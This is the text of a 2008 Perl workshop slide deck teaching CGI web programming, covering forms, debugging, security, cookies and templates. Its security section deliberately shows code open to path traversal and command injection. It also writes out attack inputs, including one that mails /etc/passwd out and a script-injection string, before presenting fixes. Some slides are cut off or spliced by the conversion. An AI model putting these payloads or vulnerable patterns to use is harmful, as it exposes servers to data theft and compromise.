introduction to web programming with perl


Upload: dave-cross

Post on 16-Apr-2017


What is Perl

Introduction to Web Programming with Perl

Dave Cross
Magnum Solutions
[email protected]
http://mag-sol.com

What We Will Cover

The HTTP Protocol

The CGI Protocol

Creating Dynamic Pages with Perl

Getting Input from Forms

The CGI Module

What We Will Cover

Basic Web Security

Using Cookies

Using Templates

Further Information

HTTP

Network Protocols

A protocol is a defined way for objects to interact

Requests and responses are clearly defined

Client makes a request

Server responds

HTTP

Hypertext Transfer Protocol

Client is (usually) a web browser

Server is a web server

Client makes a request for a URL

Server responds with appropriate data

HTTP Request

GET / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc9 Firefox/3.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

HTTP Response

HTTP/1.x 200 OK
Date: Wed, 26 Nov 2008 20:42:54 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 2172
Connection: close
Content-Type: text/html;charset=ISO-8859-1


...

Things to Note

Client requests a URL

Server works out what data is required

Response includes status code and data

Response defines type of data that follows
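The points above can be seen by pulling a raw response apart. This is a minimal sketch only: parse_response is a hypothetical helper written for illustration, and the sample response is shortened from the one shown earlier.

```perl
use strict;
use warnings;

# Split a raw HTTP response into status code, headers and body.
# parse_response is a hypothetical helper for illustration only.
sub parse_response {
    my ($raw) = @_;

    # Headers end at the first blank line; the body is everything after it
    my ($head, $body) = split /\r?\n\r?\n/, $raw, 2;
    my ($status_line, @header_lines) = split /\r?\n/, $head;

    # The status line looks like "HTTP/1.1 200 OK"
    my ($code) = $status_line =~ m{^HTTP/\S+\s+(\d{3})};

    my %headers;
    for my $line (@header_lines) {
        my ($name, $value) = split /:\s*/, $line, 2;
        $headers{ lc $name } = $value;
    }
    return ($code, \%headers, $body);
}

my $raw = join "\r\n",
    'HTTP/1.1 200 OK',
    'Content-Length: 5',
    'Content-Type: text/html;charset=ISO-8859-1',
    '',
    'hello';

my ($code, $headers, $body) = parse_response($raw);
print "Status: $code\n";
print "Type:   $headers->{'content-type'}\n";
```

The status code tells the client whether the request worked; the Content-Type header tells it how to interpret the body.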

URLs

Uniform Resource Locator

Defines a resource on the internet

http://example.com/some/path

Static URLs usually map on to a file on the web server

This mapping is defined by the web server

CGI

Beyond Static Pages

Static pages are limiting

Dynamic pages are more flexible

e.g. List of products
+ dynamic pages
= Online shop

CGI

Common Gateway Interface

Developed 1995

Defined how:

Data gets into a program

Output from program is returned to web server
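Much of the data that gets into a CGI program arrives in environment variables set by the web server. A minimal sketch, assuming the standard CGI variable names REQUEST_METHOD, QUERY_STRING and CONTENT_LENGTH; env_report is a hypothetical helper, not part of any module.

```perl
use strict;
use warnings;

# Build a plain-text report of a few standard CGI environment variables.
# env_report is a hypothetical helper, not part of any module.
sub env_report {
    my $report = '';
    for my $var (qw(REQUEST_METHOD QUERY_STRING CONTENT_LENGTH)) {
        my $value = defined $ENV{$var} ? $ENV{$var} : '(not set)';
        $report .= "$var = $value\n";
    }
    return $report;
}

# A CGI program sends a header, a blank line, then the body
print "Content-type: text/plain\n\n";
print env_report();
```

Run from the command line, every variable shows as "(not set)"; run by a web server as a CGI program, they describe the request.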

Dynamic URLs

The web server needs to recognise CGI URLs

Two common methods

Location: e.g. cgi-bin directory

Naming: e.g. .cgi extension

cgi-bin

Commonly defined as a place to put CGI programs

All requests to this directory are CGI programs

ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"

.cgi

Commonly defined as the extension for CGI programs

All requests to resources with this extension are CGI programs

Says nothing about programming language

AddHandler cgi-script .cgi

Running CGI Programs

Web server checks incoming requests

If it is a CGI request (location or extension):

Set up CGI environment

Call program

Return program output to browser
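The server's first decision, whether a request is for a CGI program at all, can be sketched in a few lines. The prefix and extension below mirror the two Apache directives shown earlier; classify is a hypothetical function, and a real web server does far more than this.

```perl
use strict;
use warnings;

# Hypothetical server settings, mirroring the two Apache directives
my $cgi_prefix = '/cgi-bin/';
my $cgi_ext    = qr/\.cgi$/;

# Decide how a request path should be handled
sub classify {
    my ($path) = @_;
    return 'cgi' if index($path, $cgi_prefix) == 0;   # by location
    return 'cgi' if $path =~ $cgi_ext;                # by extension
    return 'static';
}

for my $path ('/cgi-bin/shop', '/tools/search.cgi', '/index.html') {
    printf "%-20s => %s\n", $path, classify($path);
}
```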

Perl and CGI

Perl and CGI

The early webmasters were also sysadmins

Most sysadmins used Perl a lot

Most CGI programs produce HTML

HTML is just a form of text

Perl is great for manipulating text

Many early CGI programs were written in Perl

Perl is Not CGI

Perl was used long before CGI programs were developed

Perl continues to be used in non-web areas

Other languages have also been used to write CGI programs

Some people still (incorrectly) assume that Perl and CGI are the same thing

Simple Perl CGI Program

#!/usr/bin/perl

print "Content-type: text/plain\n\n";
print "Hello world";

Simple Perl CGI Program

#!/usr/bin/perl

print "Content-type: text/html\n\n";
print "/images/$a_pic"
);

Handling Input

Handling Input

So far all of our examples have only produced output

CGI programs are far more flexible if they can accept input

HTML Forms

CGI programs get their input from HTML forms

Text input, radio buttons, checkboxes, selectors

All seem very similar when they get to your CGI program

Sample HTML Form


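<form action="...">
Name: <input type="text" name="name">
<input type="radio" name="sex" value="Male"> Male
<input type="radio" name="sex" value="Female"> Female
<input type="submit">
</form>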

Handling the Form

#!/usr/bin/perl

use CGI ':standard';

my $name = param('name');
my $sex = param('sex');

print header,
start_html(-title=>"Hello $name"),
h1("Hello $name"),
p("Hello $name, you are $sex"),
end_html;

CGI Parameters

The CGI module has a function called 'param'

Returns the value of the parameters passed to the program

Pass it the name of the parameter you are interested in

The name is the name of the HTML form input

Listing Parameters

Without an argument, 'param' returns a list of all parameter names

my @params = param;
foreach my $param (@params) {
print p('Param ', b($param), ' is ',
i(param($param)));
}

Multivalued Parameters

Sometimes one name is associated with multiple values

The 'param' function handles this too

Checkboxes

Checkboxes allow you to choose several linked options

Drinks:
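<input type="checkbox" name="drink" value="beer"> Beer
<input type="checkbox" name="drink" value="wine"> Wine
<input type="checkbox" name="drink" value="coke"> Coke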

Three inputs with the same name

What will 'param' do?

Handling Checkboxes

Our previous form handler already copes with this

In scalar context, 'param' returns only the first value

$drinks = param('drink');

In list context, it returns all of the values

@drinks = param('drink');
print join ', ', @drinks;

Perl calls this context
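Context can be demonstrated without a web server. The sketch below uses a toy function, my_param, and a hard-coded %form hash; both are hypothetical stand-ins and this is not how CGI.pm is implemented. It only shows one function answering differently depending on what the caller asks for.

```perl
use strict;
use warnings;

# Hypothetical parsed form data: one name, several values
my %form = (drink => ['beer', 'wine', 'coke']);

# Toy stand-in for 'param': behaviour depends on the caller's context
sub my_param {
    my ($name) = @_;
    my @values = @{ $form{$name} || [] };
    return wantarray ? @values : $values[0];
}

my $first = my_param('drink');    # scalar context: first value only
my @all   = my_param('drink');    # list context: every value

print "Scalar: $first\n";
print 'List:   ', join(', ', @all), "\n";
```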

GET vs POST

HTML forms can send parameters to CGI programs in two ways

GET encodes the data in the URL

POST encodes the data in the request body

Define which method to use in the <form> element

Default value is GET

GET

The default method is GET

Can be omitted

Data in URL

http://localhost/cgi/handle_form2?name=Dave&sex=Male&drink=beer&drink=wine&drink=coke

Easy to debug

Easy to hack
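Because GET data is just part of the URL, anyone can build such a URL by hand. A minimal sketch of how the pairs are encoded: url_encode and build_get_url are hypothetical helpers, and the encoder assumes plain byte strings (it writes a space as %20, where browsers submitting forms usually write +).

```perl
use strict;
use warnings;

# Percent-encode everything except unreserved URL characters
sub url_encode {
    my ($text) = @_;
    $text =~ s/([^A-Za-z0-9\-_.~])/sprintf '%%%02X', ord $1/ge;
    return $text;
}

# Build a GET URL from a flat list: name, value, name, value, ...
sub build_get_url {
    my ($base, @pairs) = @_;
    my @parts;
    while (my ($name, $value) = splice @pairs, 0, 2) {
        push @parts, url_encode($name) . '=' . url_encode($value);
    }
    return $base . '?' . join '&', @parts;
}

print build_get_url('http://localhost/cgi/handle_form2',
    name => 'Dave', sex => 'Male', drink => 'beer', drink => 'wine'), "\n";
```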

POST

POST needs to be set explicitly

Data transmitted in HTTP request body

Not seen in URL

Harder to debug

Harder to hack

Handling GET and POST

CGI.pm hides the difference from you

Both GET and POST parameters are accessed in the same way

'param' handles both methods

Easy to swap between the two

Mishandling CGI Data

CGI.pm has been a standard part of Perl for over ten years

No reason not to use 'param'

Some people still don't

Old code

Or code based on old code

Broken CGI Parser

if ($ENV{'REQUEST_METHOD'} eq 'GET') {
@pairs = split(/&/, $ENV{'QUERY_STRING'});
} elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
}

foreach $pair (@pairs) {
my ($name, $value) = split /=/, $pair;

# some decoding skipped...

$form{$name} = $value;
}

You will see code like this

Do not use it
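To see why hand-rolled parsers go wrong, here is a sketch of just two of the things they must get right: URL-decoding and repeated names. url_decode and parse_query are hypothetical helpers for illustration; this is not a replacement for 'param', and it still ignores POST bodies, character encodings and file uploads.

```perl
use strict;
use warnings;

# Decode one URL-encoded component: '+' means space, %XX is a hex byte
sub url_decode {
    my ($text) = @_;
    $text =~ tr/+/ /;
    $text =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    return $text;
}

# Parse a query string, keeping every value for repeated names
sub parse_query {
    my ($query) = @_;
    my %form;
    for my $pair (split /[&;]/, $query) {
        my ($name, $value) = split /=/, $pair, 2;
        $value = '' unless defined $value;
        push @{ $form{ url_decode($name) } }, url_decode($value);
    }
    return \%form;
}

my $form = parse_query('name=Dave+Cross&drink=beer&drink=wine&note=50%25');
print "name:  $form->{name}[0]\n";
print 'drink: ', join(', ', @{ $form->{drink} }), "\n";
print "note:  $form->{note}[0]\n";
```

The broken parser above stores one value per name in a plain hash, so the second drink would silently overwrite the first.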

Simple CGI Summary

Simple CGI Summary

CGI defines a way to create dynamic web pages

Web server identifies CGI URLs

By location or name

Web server sets up CGI environment

Calls CGI program

Output returned to browser

CGI Input

CGI input comes from HTML forms

Input is either GET or POST

CGI program sees a series of name/value pairs

Debugging CGI

Debugging CGI

Things will go wrong when writing CGI programs

Here are some suggestions on tracking down problems

Debugging Perl

Same techniques as debugging any Perl program

Help Perl to help you

use strict: must declare variables

use warnings: warn about potential problems

Use both of these in all Perl programs
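A quick way to see what strict buys you: the sketch below compiles a small snippet containing a misspelt variable name ($totl instead of $total, both made up for the example) and prints the error Perl raises.

```perl
use strict;
use warnings;

# Compile a snippet at runtime so we can capture the error strict raises.
# The snippet misspells $total as $totl on purpose.
my $snippet = 'use strict; my $total = 1; $totl = 2; 1;';

my $ok    = eval $snippet;
my $error = $@;

print $ok ? "compiled\n" : "strict caught: $error";
```

Without 'use strict' in the snippet, Perl would quietly create a new global $totl and the typo would go unnoticed.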

Check Syntax

Use perl -c to check for syntax errors

#!/usr/bin/perl

Print "hello\n";

$ perl -c print
String found where operator expected at print line 3, near "Print "hello\n""
(Do you need to predeclare Print?)
syntax error at print line 3, near "Print "hello\n""
print had compilation errors.

Check Error Log

All web servers write an error log

Location depends on configuration

Generic error message to browser

Security feature

Real error message in error log

Anything written to STDERR goes to error log

Writing to Error Log

#!/usr/bin/perl

use CGI 'header';

print header(
-type => 'text/plain'
);

print 'Nothing went wrong!';

# warn writes to STDERR
warn '(Actually something did)';

Errors to Browser

Sometimes it's useful to see real errors in the browser

CGI::Carp does this

use CGI::Carp 'fatalsToBrowser';

Still a security hole

Remove once debugging is over

Or, at least, comment it out

Debugging HTTP

It's often useful to debug the HTTP exchange

See exactly what requests and responses are being exchanged

LWP (from CPAN) includes the GET, POST and HEAD programs

Debugging HTTP

#!/usr/bin/perl

use CGI 'header';
print header(
-type => 'text/plain',
-x_go_away => "It's a secret",
);

print 'See headers for more info';

Using HEAD

$ HEAD http://localhost/cgi/headers

200 OK
Connection: close
Date: Sat, 22 Nov 2008 14:59:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Type: text/plain; charset=ISO-8859-1
Client-Date: Sat, 22 Nov 2008 14:59:15 GMT
Client-Peer: 127.0.0.1:80
Client-Response-Num: 1
X-Go-Away: It's a secret

Live HTTP Headers

Live HTTP Headers is an add-on for Firefox

Allows you to watch the complete HTTP exchange:

View

Save

Replay

Web Security

Web Security

Exposing a program on your web server is a brave thing to do

Anyone connected to the internet can run your program

Not everyone out there is nice

Need to be sure your program is secure

What Can Go Wrong?

You want a program to display files from your server

Accepts a file as a parameter

Send the contents of the file to the browser

Here's a first attempt

File Viewer Program

#!/usr/bin/perl
use CGI ':standard';

my $file = param('filename');

print header(-type => 'text/plain');

open FILE, $file
or die "Can't open $file: $!\n";
print while <FILE>;

What's Wrong With That?

You just compromised the security of your server

Your server contains many files that outsiders shouldn't see

e.g. /etc/passwd

Now anyone on the internet can see a list of usernames on your server

Forms Won't Save You

You could present a page that only allows people to choose certain files

People will look at the source of the form and hack the URL

You could change GET to POST to prevent URL-hacking

People will create their own form and use that to send hacked parameters

Another Attempt

#!/usr/bin/perl
use CGI ':standard';

my $dir = '/usr/files/';
my $file = $dir . param('filename');

print header(-type => 'text/plain');

open FILE, $file
or die "Can't open $file: $!\n";
print while <FILE>;

Another Attempt

We have forced files to exist in a certain directory

Only files in that directory can be viewed

That's not true

We can use '..' to move up a directory

filename=../../etc/passwd

Still insecure

A Different Problem

We want to run a command on the server taking input from the user

For example, a manual page viewer

Takes a page name from user input

Manual Page Viewer

#!/usr/bin/perl

use CGI ':standard';

my $page = param('man');

print header(-type=>'text/plain');
print `man $page | col -b`;

What's Wrong With That?

Once again you've compromised security on your server

Problem is in this line:

print `man $page | col -b`;

Passing user input to an external program

Dangerous input

ls; mail [email protected] < /etc/passwd

Another Problem

Accept user input and write a results page using it

We've done this before

What if the input includes Javascript?

name=Dave

name=Dave<script>alert("Gotcha")</script>

Javascript can be dangerous
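One common defence is to escape HTML metacharacters before echoing user input back to the browser. A minimal sketch, assuming the output goes into ordinary HTML text or a double-quoted attribute; escape_html is a hypothetical helper written for illustration.

```perl
use strict;
use warnings;

# Replace the characters that have special meaning in HTML.
# A single pass over the string avoids escaping an '&' twice.
sub escape_html {
    my ($text) = @_;
    my %entity = (
        '&' => '&amp;',
        '<' => '&lt;',
        '>' => '&gt;',
        '"' => '&quot;',
    );
    $text =~ s/([&<>"])/$entity{$1}/g;
    return $text;
}

my $name = 'Dave<script>alert("Gotcha")</script>';
print escape_html($name), "\n";
```

The browser now displays the script tag as text instead of running it.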

Trust No-One

All of these problems have the same root cause

We trusted user input

Never trust your users

They are either malicious or stupid

Both options are dangerous to you

Check All Input

Check everything that comes into your program

Don't trust any piece of data

Especially if you're sending it out of your program

Use whitelists to define valid data

Throw out anything that doesn't match

Safe File Viewer

#!/usr/bin/perl
use CGI ':standard';

print header(-type => 'text/plain');

my $dir = '/usr/files/';
my $file = param('filename');
if ($file =~ /^(\w[\w\.]+)$/) {
$file = "$dir/$1";
} else {
print 'Go away!';
die "Bad filename: $file\n";
}
...

Is It Safe?

The safe file viewer assumes that all valid files are in one directory

Therefore the filename can only contain certain characters

/^(\w[\w\.]+)$/

Word characters and dots

No directory slashes

Anchors to match whole string
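The whitelist can be tried against a few inputs outside the web server. This sketch wraps the same regex in a hypothetical helper, safe_filename; the sample filenames are made up.

```perl
use strict;
use warnings;

# Return the filename if it matches the whitelist, otherwise undef
sub safe_filename {
    my ($name) = @_;
    return undef unless defined $name;
    return $name =~ /^(\w[\w.]+)$/ ? $1 : undef;
}

for my $input ('report.txt', '../../etc/passwd', '/etc/passwd', '.hidden') {
    my $ok = safe_filename($input);
    printf "%-20s %s\n", $input, defined $ok ? 'accepted' : 'rejected';
}
```

Only the first input is accepted: the others contain a slash or start with a dot, neither of which the pattern allows.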

Safe Manual Viewer

#!/usr/bin/perl

use CGI ':standard';

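print header(-type=>'text/plain');

my $page = param('man');
if (defined $page and $page =~ /^(\w+)/) {
  $page = $1;
} else {
  # no leading word characters: reject instead of running the shell
  print 'Go away!';
  die "Bad page name\n";
}

print `man $page | col -b`;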

Is It Safe?

Uses a similar approach to the safe file viewer

Unix commands consist of word characters

Use the word characters from the start of the input string

Ignore the rest
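A different technique from the one in the slides, and a complement to input checking rather than a replacement, is to avoid the shell altogether by passing the command as a list. The sketch below uses the list form of a piped open; run_without_shell is a hypothetical helper, and the running perl binary ($^X) stands in for 'man' so the example works anywhere Perl does on a Unix-like system.

```perl
use strict;
use warnings;

# Run a command given as a list, so no shell ever parses the arguments.
# $^X is the running perl binary, a harmless stand-in for 'man' here.
sub run_without_shell {
    my (@command) = @_;
    open my $pipe, '-|', @command
        or die "Can't run $command[0]: $!\n";
    local $/;                      # read all output in one go
    my $output = <$pipe>;
    close $pipe;
    return $output;
}

my $input  = 'ls; echo hacked';    # hostile input with a shell metacharacter
my $output = run_without_shell($^X, '-e', 'print "arg: $ARGV[0]"', $input);
print "$output\n";
```

The semicolon reaches the child program as ordinary text in a single argument; nothing interprets it as a command separator.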

Safe HTML Input

#!/usr/bin/perl

use CGI ':standard';

my $name = param('name');
my $sex = param('sex');

$name =~ s/</&lt;/g;
...

... -> Privacy -> Show cookies

You will probably have a lot of cookies

Sites use them to track visitors

Some people block them for that reason

Using Cookies

CGI.pm contains a cookie function

Used to both create and access cookies

Cookies need to be sent in the CGI header

Often the first thing you need to do

Setting a Cookie

my $time_cookie = cookie(
-name=>'time',
-value=>scalar localtime,
-expires=>'+1y'
);

print header(
-cookie => $time_cookie
);
print start_html(
-title=>'Cookie test'
);
print h1('Cookie test');

Getting a Cookie

if (my $time = cookie('time')) {
  print p('You last visited this ',
          "page at $time");
} else {
  print p("You haven't visited ",
          'this page before');
}

Cookie Confusion

People sometimes find cookie code confusing

There are often two completely separate cookies in a program

One incoming, one outgoing

The outgoing cookie is usually dealt with first

Because it needs to be in the header
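The two directions are easier to keep apart once you see the headers involved. A simplified sketch with hypothetical helpers and made-up cookie names: set_cookie_header builds the outgoing Set-Cookie line, parse_cookies reads the incoming Cookie header. Real code should let CGI.pm's cookie function handle escaping and expiry.

```perl
use strict;
use warnings;

# Outgoing: build a Set-Cookie header line (simplified; no escaping)
sub set_cookie_header {
    my ($name, $value, $max_age) = @_;
    return "Set-Cookie: $name=$value; Max-Age=$max_age";
}

# Incoming: parse the browser's Cookie header, e.g. "a=1; b=2"
sub parse_cookies {
    my ($header) = @_;
    my %cookies;
    for my $pair (split /;\s*/, $header) {
        my ($name, $value) = split /=/, $pair, 2;
        $cookies{$name} = $value;
    }
    return \%cookies;
}

# One year, in seconds
print set_cookie_header('visits', 3, 60 * 60 * 24 * 365), "\n";

my $cookies = parse_cookies('visits=3; theme=dark');
print "visits = $cookies->{visits}\n";
```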

Login Example

Cookies can be used to track whether a user is logged in to a site

Write a cookie when the user logs in

Delete it when the user logs out

Actually just force it to expire

Log In With Cookies (1)

my $name;
my $logged;

if (param('login')) {
$logged = 1;
$name = param('name');
print header(
-cookie => cookie(
-name => 'name',
-value => $name,
-expires => '+1y',
)
);
}

Log In With Cookies (2)

elsif (param('logout')) {
$logged = 0;
$name = 'Guest';
print header(
-cookie => cookie(
-name=>'name',
-value=>'',
-expires=>'-1d',
)
);
}

Log In With Cookies (3)

else {
$logged = defined cookie('name');
$name = cookie('name') || 'Guest';
print header;
}

print start_html(-title => 'Cookies');
print h1('Cookies');
print p('This is a cookie test page');

$name =~ s/</&lt;/g;
...
submit(-name => 'logout',
-value => 'logout'));
} else {
print p('Enter your name: ',
textfield(-name => 'name'),
submit(-name => 'login',
-value => 'Set name'));
print end_form;
}

print end_html;

Cookie Security

Secure web apps don't reveal any more data than is necessary

Don't trust the browser

Don't store identifiable data in a cookie

Use a nondescript name

Store the real data on your server

Store a reference to data in cookie
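The last two points can be sketched as a session table: the cookie carries only an opaque ID and the real data stays on the server. Everything here is hypothetical (the %sessions hash, new_session, session_data), and the ID generation is NOT cryptographically strong; a real site needs a secure random source and persistent storage.

```perl
use strict;
use warnings;
use Digest::SHA qw(sha256_hex);

my %sessions;   # stand-in for server-side storage (a database in real life)

# Store data on the server and return an opaque ID for the cookie
sub new_session {
    my (%data) = @_;
    # Illustration only: not a secure source of randomness
    my $id = sha256_hex(join '|', time(), $$, rand());
    $sessions{$id} = {%data};
    return $id;
}

# Look up the data for an ID sent back by the browser
sub session_data {
    my ($id) = @_;
    return $sessions{$id};
}

my $id = new_session(name => 'Dave');
print "Cookie value: $id\n";
print "Server knows: ", session_data($id)->{name}, "\n";
```

The browser never sees the name, and an ID the server did not issue simply finds nothing.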

Templates

Templates

So far all of our HTML has been stored in the program

Either hard-coded HTML or CGI.pm functions

This is fine for demos or simple programs

Can cause problems with larger projects

Separating Concerns

It's a good idea to separate business logic from display logic

Code that works out what to display

Code that works out how to display it

Advantages

Easier to change look of site

Easier to have consistent look and feel

Easier to split work between designers and programmers

Easier to produce alternative views of data

Simple Templating

See perlfaq4: "How can I expand variables in text strings?"

Everyone writes a templating system

Most people release their templating system to CPAN

Please don't do that
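Purely to illustrate the kind of substitution that FAQ entry is about, here is a toy sketch. The function name expand and the sample template are made up, and this is exactly the sort of home-made system you should not release.

```perl
use strict;
use warnings;

# Replace each $word in the text with the matching value from %$vars.
# Unknown names are left untouched so mistakes stay visible.
sub expand {
    my ($text, $vars) = @_;
    $text =~ s/\$(\w+)/exists $vars->{$1} ? $vars->{$1} : "\$$1"/ge;
    return $text;
}

# Single quotes: Perl itself does not interpolate $name here
my $template = 'Hello $name, you are $sex. Missing: $oops';
print expand($template, { name => 'Dave', sex => 'Male' }), "\n";
```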

Templating Systems

Many templating systems on CPAN

Text::Template

HTML::Template

HTML::Mason

Template Toolkit

Many more

I choose the Template Toolkit

Template Toolkit

Flexible templating system

Equally useful in web and non-web applications

Simple templating language

Not Perl

Good Book Too

CGI Using Templates

Create an output template containing your HTML

CGI program acts largely as before:

Processes inputs

Determines outputs

Passes outputs to template processor

Template Example

#!/usr/bin/perl

use CGI qw(param header);
use Template;

my $tt = Template->new;
my $name = param('name');
my $sex = param('sex');
my @drink = param('drink');

print header;

$tt->process('form.tt',
{ name => $name,
sex => $sex,
drink => \@drink })
or die $tt->error;

Template Example



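<html>
<head>
<title>Template Toolkit</title>
</head>
<body>
<h1>Template Toolkit</h1>
<p>Your name is [% name %]</p>
<p>Your sex is [% sex %]</p>
<p>You like to drink:</p>
<ul>
[% FOREACH d IN drink -%]
<li>[% d %]</li>
[% END %]
</ul>
</body>
</html>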



Simpler Templates

#!/usr/bin/perl

use CGI qw(param header);
use Template;

my $tt = Template->new;

print header;

$tt->process('form2.tt')
or die $tt->error;

Simpler Templates

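[% USE CGI -%]
<html>
<head>
<title>Template Toolkit</title>
</head>
<body>
<h1>Template Toolkit</h1>
<p>Your name is
[% CGI.param('name') %]</p>
<p>Your sex is
[% CGI.param('sex') %]</p>
<p>You like to drink:</p>
<ul>
[% FOREACH d IN CGI.param('drink') -%]
<li>[% d %]</li>
[% END %]
</ul>
</body>
</html>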



More Information

More Information

A really quick overview of web programming with Perl

Skimmed over a lot of detail

Some ideas for other things to investigate

Other sources of information

Things Missed Out

CGI.pm: far more functionality than we have covered

CGI environment functions

Sticky fields

Multi-page forms

More complex HTML generation

See perldoc CGI

Alternatives to CGI

CGI can be slow

Perl starts up for every page visit

Doesn't scale well

Alternative approaches

mod_perl

Embeds a Perl interpreter in Apache

Much faster and more flexible

Storing Data

Most web applications will deal with a database

Storing and retrieving data

Standard Perl database interface: DBI

More advanced database interfaces: DBIx::Class

Web Frameworks

Web frameworks are very fashionable

Model (database)

View (templates)

Controller (logic)

MVC framework

e.g. Ruby on Rails

Perl Frameworks

Perl has MVC frameworks

Most popular is probably Catalyst

DBIx::Class + Template Toolkit

See Matt Trout's Tutorial after lunch

Sources of Information

Documentation for Perl modules at CPAN: http://search.cpan.org/

CGI.pm: http://search.cpan.org/dist/CGI.pm

Template Toolkit: http://search.cpan.org/dist/Template-Toolkit

http://tt2.org/

Books

CGI Programming with Perl (Guelich, Gundavaram, Birznieks)

Writing CGI Applications with Perl (Meltzer, Michalski)

Official Guide to Programming with CGI.pm (Stein)

That's All Folks

Thank you for listening

Any questions?

I'll be around all day

Feel free to email [email protected]


London Perl Workshop, 29th November 2008